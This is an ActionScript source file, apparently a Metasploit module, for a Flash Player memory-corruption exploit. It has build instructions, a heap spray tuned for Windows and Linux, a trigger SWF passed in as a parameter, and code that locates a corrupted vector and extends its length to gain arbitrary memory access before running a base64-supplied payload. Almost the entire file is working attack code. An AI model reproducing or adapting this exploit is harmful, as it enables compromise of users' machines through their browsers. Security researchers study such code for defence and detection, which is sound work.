// Build how to: // 1. Download the AIRSDK, and use its compiler. // 3. Download the Flex SDK (4.6) // 4. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) // (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) // 5. Build with: mxmlc -o msf.swf Exploit.as // It uses some original code from @hdarwin89 for exploitation using ba's and vectors package { import flash.display.Sprite import flash.display.LoaderInfo import flash.display.Loader import flash.utils.ByteArray import flash.utils.Endian import flash.utils.* import flash.external.ExternalInterface import mx.utils.Base64Decoder public class Exploit extends Sprite { private var uv:Vector. = new Vector. private var exploiter:Exploiter private var spray:Vector. = new Vector.(89698) private var interval_id:uint private var trigger_swf:String private var b64:Base64Decoder = new Base64Decoder() private var payload:ByteArray private var platform:String private var os:String private var original_length:uint = 0 public function Exploit() { var i:uint = 0 platform = LoaderInfo(this.root.loaderInfo).parameters.pl os = LoaderInfo(this.root.loaderInfo).parameters.os trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh var pattern:RegExp = / /g; b64_payload = b64_payload.replace(pattern, "+") b64.decode(b64_payload) payload = b64.toByteArray() if (platform == 'win') { original_length = 0x1e for (i = 0; i < 89698; i = i + 1) { spray[i] = new Vector.(1014) spray[i][0] = 0xdeadbeef spray[i][1] = 0xdeedbeef spray[i][2] = i spray[i][29] = 0x14951429 } for(i = 0; i < 89698; i = i + 1) { spray[i].length = 0x1e } } else if (platform == 'linux') { original_length = 1022 for (i = 0; i < 89698; i = i + 1) { spray[i] = new Vector.(1022) spray[i][0] = 0xdeadbeef spray[i][1] = 0xdeedbeef spray[i][2] = i spray[i][29] = 0x956c1490 // 0x956c1490 + 0xb6c => 0x956c1ffc => controlled by position 1021 spray[i][39] = 1 // 0x956c1fac + 0xf8 => is_connected = 1 in order to allow corruption of offsets 0x54 and 0x58 spray[i][1021] = 0x956c1fac // 0x956c1fac + 0x54 => 0x956c2000 (0x54, and 0x58 offsets are corrupted) } } var trigger_byte_array:ByteArray = createByteArray(trigger_swf) trigger_byte_array.endian = Endian.LITTLE_ENDIAN trigger_byte_array.position = 0 // Trigger corruption var trigger_loader:Loader = new Loader() trigger_loader.loadBytes(trigger_byte_array) interval_id = setTimeout(do_exploit, 2000) } private function createByteArray(hex_string:String) : ByteArray { var byte:String var byte_array:ByteArray = new ByteArray() var hex_string_length:uint = hex_string.length var i:uint = 0 while(i < hex_string_length) { byte = hex_string.charAt(i) + hex_string.charAt(i + 1) byte_array.writeByte(parseInt(byte,16)) i = i + 2 } return byte_array } private function do_exploit():void { clearTimeout(interval_id) for(var i:uint = 0; i < spray.length; i = i + 1) { if (spray[i].length != 1022 && spray[i].length != 0x1e) { Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16)) spray[i][1022] = 0xffffffff spray[i + 1][0x3ffffbff] = spray[i][1023] spray[i + 1][0x3ffffbfe] = original_length uv = spray[i + 1] break } } for(i = 0; i < spray.length; i = i + 1) { if (spray[i].length == 1022 || spray[i].length == 0x1e) { spray[i] = null } } if (uv == null || uv.length != 0xffffffff) { return } exploiter = new Exploiter(this, platform, os, payload, uv) } } }